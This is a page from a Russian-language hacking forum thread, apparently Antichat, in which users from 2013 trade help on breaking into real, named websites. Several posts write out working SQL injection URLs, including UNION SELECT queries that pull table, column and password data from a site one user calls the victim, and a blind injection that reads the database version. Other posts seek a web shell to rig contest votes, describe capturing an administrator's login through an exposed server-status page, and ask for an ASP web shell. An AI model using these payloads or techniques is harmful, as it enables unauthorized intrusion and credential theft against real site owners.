Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 1116 of 1207
  1. wkuzy

    wkuzy New Member

    Joined:
    8 Aug 2012
    Messages:
    5
    Likes Received:
    0
    Reputations:
    -5
    Всем привет!
    Кто подскажет,есть сайт ......../wechselbude/index.php?page=content&name=info
    Если сделать так ......../wechselbude/index.php?page=content&name=(SELECT%20CONCAT(version(),user(),database()))

    то выводит version 5.1.66-nmm3-log
    user d01333ce@localhost
    db d01333ce

    но дальше вообще никак ни через union ни через and,
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/htdocs/w00db281/wechselbude/content/content.php on line 6
     
    #22301 wkuzy, 30 Jun 2013
  2. wkuzy

    wkuzy New Member

    Joined:
    8 Aug 2012
    Messages:
    5
    Likes Received:
    0
    Reputations:
    -5
    Я с этими инклудами вообще не дружу :(
     
    #22302 wkuzy, 30 Jun 2013
  3. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    wkuzy,

     
    #22303 trololoman96, 30 Jun 2013
  4. wkuzy

    wkuzy New Member

    Joined:
    8 Aug 2012
    Messages:
    5
    Likes Received:
    0
    Reputations:
    -5
    Спасибо ,дальше я сам:)
     
    #22304 wkuzy, 30 Jun 2013
  5. Kirka121

    Kirka121 New Member

    Joined:
    16 May 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    пытаюсь девочке помочь с хреновым контестом.
    уверен что саит написан по левому.

    кто поможет закачать шелл, или пробить SQL иньекцыю чтоб увеличить девочке колво votes?

    саит; http://whowearsitbetter.com/2july.php

    помогаю подруге и учусь уму разуму, помошь отблагадорю через paypal.
     
    #22305 Kirka121, 1 Jul 2013
    Last edited: 1 Jul 2013
  6. Kirka121

    Kirka121 New Member

    Joined:
    16 May 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    ты когда в послендии раз первыи пост етои темы читал?
     
    #22306 Kirka121, 1 Jul 2013
  7. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    Я нашел проблему. В файле самого вп. В wp-includes/load.php есть такое:

    Code:
    	// Escape with wpdb.
	$_GET    = add_magic_quotes( $_GET    );
	$_POST   = add_magic_quotes( $_POST   );
	$_COOKIE = add_magic_quotes( $_COOKIE );
	$_SERVER = add_magic_quotes( $_SERVER );

	// Force REQUEST to be GET + POST.
	$_REQUEST = array_merge( $_GET, $_POST );
    и сам код функции add_magic_quotes
    Code:
    function add_magic_quotes( $array ) {
	foreach ( (array) $array as $k => $v ) {
		if ( is_array( $v ) ) {
			$array[$k] = add_magic_quotes( $v );
		} else {
			$array[$k] = addslashes( $v );
		}
	}
	return $array;
}
    Эта фигня портит всю малину. Я так понимаю что тут уже ничего не сделать ? :(
     
    #22307 trololoman96, 1 Jul 2013
  8. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Есть сайт с открытым /server-status, хочу попытаться выловить авторизацию админа, как это лучше сделать? мб можно как нибудь постоянно парсить все результаты выводимые, и через 1-2 дня к примеру проверить этот список?
     
    #22308 Br@!ns, 3 Jul 2013
  9. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Ты только адрес админ-панели максимум выловишь.

    Не, ну если авторизация идёт через GET - То да, поймаешь аутентификационные данные.

    А так, максимум - адрес админ панели.
     
    _________________________
    #22309 BigBear, 3 Jul 2013
    2 people like this.
  10. Voinmraka

    Voinmraka New Member

    Joined:
    23 Nov 2010
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    есть Phpmyadmin: 3.3.7deb7

    можно ли на нем раскрыть пути? есть права рута
     
    #22310 Voinmraka, 3 Jul 2013
  11. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Именно так, запросы и через GET тоже идут. Вот и хотелось бы все эти постояннообновляющиеся запросы куда нибудь логировать или парсить в режиме реального времени, возможно ли это как нибудь сделать?
     
    #22311 Br@!ns, 4 Jul 2013
  12. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Ну тебе никто не мешает цеплять на страницу /server-status и парсить её содержимое. Хоть запарся.

    Единственное что - ты увидешь все запросы как от клиентов, так и от админов, а если сайт высокопосещаемый, то этих запросов будут тысячи, миллионы, сможешь ли ты выловить иголку в стоге сена ???

    Самое простое - дождаться когда админ будет в сети, напечатать мат к любой новости и пожаловаться на него. И ждать пока админ его почистит, при этом мониторить /server-status. Если комментарии удаляются через админку - есть шанс увидеть её адрес.
     
    _________________________
    #22312 BigBear, 5 Jul 2013
  13. HACKTEAM

    HACKTEAM Banned

    Joined:
    17 Oct 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    ходел исправить чара и наткнулся вот на это http://wow-cool.ru/?ajaxZone=1&module=chars&action=repair&repairChar=237760&repairRelam=fun

    что мне с теперь можно с этим делать?
    это случайно не скуль инъекция?
    прошу не кидать в меня помидорами т.к. я ещё не очень разбираюсь в этом
     
    #22313 HACKTEAM, 6 Jul 2013
    Last edited: 6 Jul 2013
  14. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    ничего,но надежда есть всегда. На сервере стоит форум Invision Power Board 3.4,попробуй в привате сплоит поискать

    http://forum.wow-cool.ru/admin/upgrade/index.php?app=upgrade&s=&section=index&do=login
     
    #22314 er9j6@, 6 Jul 2013
  15. zeoman

    zeoman Member

    Joined:
    17 Jun 2010
    Messages:
    37
    Likes Received:
    43
    Reputations:
    43
    Возможно не сюда запостил ищу веб шел .ASP веб сервер IIS функционал скромный заливка и правка файлов
     
    #22315 zeoman, 8 Jul 2013
  16. Romaz

    Romaz Banned

    Joined:
    5 Sep 2010
    Messages:
    92
    Likes Received:
    12
    Reputations:
    8
    http://forum.antichat.ru/showthread.php?t=103576
    https://rdot.org/forum/showthread.php?t=1116
     
    #22316 Romaz, 8 Jul 2013
  17. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    http://hawk.ru/toto.php?n_nomer=-3
    Можно ли по этой ошибке чо нибудь получить?
     
    #22317 Br@!ns, 8 Jul 2013
  18. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Можно блиндом получить

    http://hawk.ru/toto_stat_day.php?n_kogda=20120904%20and%20(select%20ord(substr(@@version,1,1))%20)=53

    5.0.51-log
     
    #22318 er9j6@, 8 Jul 2013
    1 person likes this.
  19. diker

    diker New Member

    Joined:
    12 Jul 2010
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    help


    актуально, что можно с этим сделать
     
    #22319 diker, 9 Jul 2013
  20. usupekx

    usupekx New Member

    Joined:
    3 Jul 2013
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Подскажите:

    жертва - ttp://www.terrapex.ca/en/realisation.php?larealisation=Environmental+Compliance+Audit&id=16

    узнаю названия таблиц - ttp://terrapex.ca/en/realisation.php?larealisation=Environmental+Compliance+Audit&id=-16 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()

    узнаю название столбцов - http://terrapex.ca/en/realisation.php?larealisation=Environmental+Compliance+Audit&id=-16 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()

    на выходе имею такую связку (таблица - user, столбцы - userName,userPass)

    ww.terrapex.ca/en/realisation.php?larealisation=Environmental+Compliance+Audit&id=-16 union select 1,group_concat(userPass),3,4,5,6 from users

    и получаю:
    Invalid query: Unknown column 'userPass' in 'field list'




    Уязвимость разбираю из соседнего раздела https://forum.antichat.ru/threadnav21336-1550-10.html - нашел её YaBTR и вот вариант рабочий:

    ttp://www.terrapex.ca/en/nouvelle.php?lanouvelle=&id=22+union+select+1,group_concat(userpwd,0x3a,user rights),version(),4,5+from+users--

    Где и как найти эти userpwd,0x3a,user rights
     
    #22320 usupekx, 10 Jul 2013
    Last edited: 10 Jul 2013
(You must log in or sign up to post here.)
Page 1116 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.